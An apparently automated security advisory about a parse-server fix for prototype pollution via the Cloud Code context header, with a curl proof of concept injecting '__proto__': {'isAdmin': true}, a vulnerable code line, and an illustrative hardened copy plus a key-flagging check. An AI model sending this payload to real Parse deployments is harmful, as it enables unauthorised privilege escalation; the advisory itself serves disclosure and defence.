Potential Security Vulnerability Detected
Repository: parse-community/parse-server
Commit: d5f5128
Author: Manuel
Date: 2026-03-29T23:21:18Z
Commit Message
fix: Cloud Code trigger context vulnerable to prototype pollution (#10352)
Pull Request
PR: #10352 - fix: Cloud Code trigger context vulnerable to prototype pollution
Labels: state:released-alpha
Description:
Issue
Cloud Code trigger context vulnerable to prototype pollution
Analysis
Vulnerability Type: Prototype Pollution
Severity: High
Description
The patch fixes a prototype pollution vulnerability in the Cloud Code trigger context where user-controllable input via the X-Parse-Cloud-Context header or _context body field could inject properties into Object.prototype. This could lead to privilege escalation or unexpected behavior in Cloud Code by altering the prototype chain of the request context. The fix isolates the context object by creating it with a null prototype, preventing pollution.
Affected Code
// Set a copy of the context on the request object.
request.context = Object.assign({}, context);
Proof of Concept
Send a request with header 'X-Parse-Cloud-Context' set to '{"__proto__": {"isAdmin": true}}' and a beforeSave Cloud Code trigger accessing request.context.isAdmin. Before the patch, isAdmin would be true (prototype polluted), potentially allowing unauthorized admin actions. Example request:
curl -X POST http://localhost:8378/1/classes/ContextTest \
  -H 'X-Parse-Application-Id: test' \
  -H 'X-Parse-REST-API-Key: rest' \
  -H 'X-Parse-Cloud-Context: {"__proto__": {"isAdmin": true}}' \
  -H 'Content-Type: application/json' \
  -d '{"foo":"bar"}'
Before patch, in Cloud Code:
Parse.Cloud.beforeSave('ContextTest', req => {
  if (req.context.isAdmin) {
    // unauthorized escalation
  }
});
Before the patch, isAdmin would be true due to prototype pollution; after the patch it is undefined.
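The two copy strategies side by side, as an added example that is not parse-server's code: the pre-patch `Object.assign({}, context)` and the patched null-prototype copy, both fed the same parsed header value, plus a defender-side check that flags prototype-related keys in an incoming context. The function names and the sample header value are constructed for this illustration.

```javascript
// Constructed sample of an X-Parse-Cloud-Context header value (not a real capture).
const RAW_CONTEXT = '{"__proto__": {"isAdmin": true}, "source": "mobile"}';

// JSON.parse does not invoke the __proto__ setter: the result is a plain object
// with an *own* enumerable property literally named "__proto__".
function parseContextHeader(raw) {
  const parsed = JSON.parse(raw);
  if (parsed === null || typeof parsed !== 'object' || Array.isArray(parsed)) {
    throw new TypeError('context must be a JSON object');
  }
  return parsed;
}

// Pre-patch shape (hypothetical name): Object.assign writes with [[Set]], so the
// "__proto__" key hits the inherited setter and swaps the copy's prototype.
function copyContextVulnerable(context) {
  return Object.assign({}, context);
}

// Patched shape (hypothetical name): a null-prototype target has no __proto__
// setter, so the key is stored as an inert own data property and lookups such
// as context.isAdmin never reach attacker data.
function copyContextHardened(context) {
  return Object.assign(Object.create(null), context);
}

// Caveat: the hardened context has no Object.prototype methods, so callers must
// use Object.hasOwn / hasOwnProperty.call rather than context.hasOwnProperty().
function contextHas(context, key) {
  return Object.prototype.hasOwnProperty.call(context, key);
}

// Defender check: surface prototype-related keys in an incoming context so the
// request can be logged or rejected before any trigger runs.
function findSuspiciousKeys(context) {
  const banned = new Set(['__proto__', 'constructor', 'prototype']);
  return Object.keys(context).filter(k => banned.has(k));
}

function demo(raw = RAW_CONTEXT) {
  const ctx = parseContextHeader(raw);
  return {
    before: copyContextVulnerable(ctx).isAdmin,              // true
    after: copyContextHardened(ctx).isAdmin,                 // undefined
    afterKeepsData: copyContextHardened(ctx).source,         // 'mobile'
    flagged: findSuspiciousKeys(ctx),                        // ['__proto__']
    globalPolluted: contextHas(Object.prototype, 'isAdmin'), // false
  };
}
```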
This issue was automatically created by Vulnerability Spoiler Alert.
Detected at: 2026-03-30T00:00:35.188Z